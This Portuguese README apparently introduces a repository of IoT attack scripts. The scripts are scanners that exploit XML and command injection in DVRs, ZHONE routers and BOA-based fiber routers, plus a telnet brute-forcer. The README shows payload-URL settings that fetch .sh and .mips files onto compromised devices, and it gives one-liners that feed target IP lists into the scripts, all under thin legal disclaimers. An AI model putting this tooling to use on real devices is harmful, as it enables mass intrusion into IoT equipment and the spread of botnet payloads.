Uma coleção de ferramentas para avaliação de segurança em rede, projetadas para identificar vulnerabilidades em diversos dispositivos. Apenas para fins educacionais e testes de segurança autorizados.
Estas ferramentas foram desenvolvidas exclusivamente para pesquisa legítima de segurança, propósitos educacionais e testes de segurança autorizados. O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal e antiético.
O uso indevido destas ferramentas pode resultar em:
- Consequências legais
- Acusações criminais
- Responsabilidade civil
Este repositório contém vários scanners de rede que visam diferentes vulnerabilidades em dispositivos:
- Scanner de DVR (
dvr.py): Testa dispositivos DVR para vulnerabilidades de injeção XML - Scanner de Roteadores ZHONE (
zhone.py): Testa roteadores ZHONE para vulnerabilidades de injeção de comando - Força Bruta Telnet (
brute.py): Testa credenciais comuns de telnet em dispositivos de rede - Scanner de Roteadores Fibra (
fiber.py): Testa roteadores de fibra com servidor web BOA para vulnerabilidades
Antes de usar estas ferramentas, você precisa configurar as URLs de payload para apontar para seus próprios servidores. Nunca use estas ferramentas com intenção maliciosa ou contra alvos não autorizados.
Cada script contém uma URL de payload que precisa ser modificada para apontar para seu ambiente de teste controlado:
# Exemplo do Scanner de DVR
PAYLOAD_URL = "http://SEU_IP_DE_SERVIDOR/SEU_ARQUIVO_DE_TESTE.sh"
PAYLOAD_NAME = "SEU_ARQUIVO_DE_TESTE.sh"
# Exemplo do Scanner de Roteadores ZHONE
PAYLOAD = "http://SEU_IP_DE_SERVIDOR/SEU_ARQUIVO_DE_TESTE.mips"Substitua estas URLs pelos endereços de seu próprio servidor onde você hospeda arquivos de teste "inofensivos" para verificar a vulnerabilidade.
cat lista_ips_alvo.txt | python3 dvr.py 80cat lista_ips_alvo.txt | python3 zhone.py 80python3 bruter.py alvos.txt 50 sucesso.txtcat lista_ips_alvo.txt | python3 fiber.py 80Cada ferramenta inclui:
- Capacidade de escaneamento multi-thread
- Atualizações de status em tempo real
- Teste automatizado de credenciais contra senhas padrão comuns
- Validação de vulnerabilidades
- Testa dispositivos DVR para vulnerabilidades de injeção XML na configuração NTP
- Suporta múltiplos métodos de autenticação
- Tenta limpar as configurações após os testes
- Testa roteadores ZHONE para injeção de comando na funcionalidade de ping
- Usa autenticação baseada em sessão
- Testa uma lista extensa de credenciais comuns de dispositivos IoT e de rede
- Tratamento de timeout de conexão
- Acompanhamento de sucesso em tempo real
- Testa roteadores de fibra que usam servidor web BOA para injeção de comando
- Explora vulnerabilidades na funcionalidade de traceroute
Cada ferramenta fornece atualizações de status em tempo real no console:
- Número de conexões tentadas
- Número de dispositivos descobertos
- Número de logins bem-sucedidos
- Número de vulnerabilidades confirmadas
Estas ferramentas são fornecidas "como estão" sem garantia de qualquer tipo. O uso destas ferramentas para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer a todas as leis locais, estaduais, nacionais e internacionais aplicáveis.
Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.
Contribuições para melhorar ferramentas de pesquisa de segurança são bem-vindas, especialmente aquelas que:
- Melhoram verificações de segurança
- Adicionam documentação
- Aprimoram a qualidade do código
- Adicionam capacidades de divulgação responsável
Essas ferramentas foram criadas por @CirqueiraDev
Aproveita e me segue no insta :D
- Discord: Cirqueira
- Meu instagram
Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use estas ferramentas de forma ética e legal.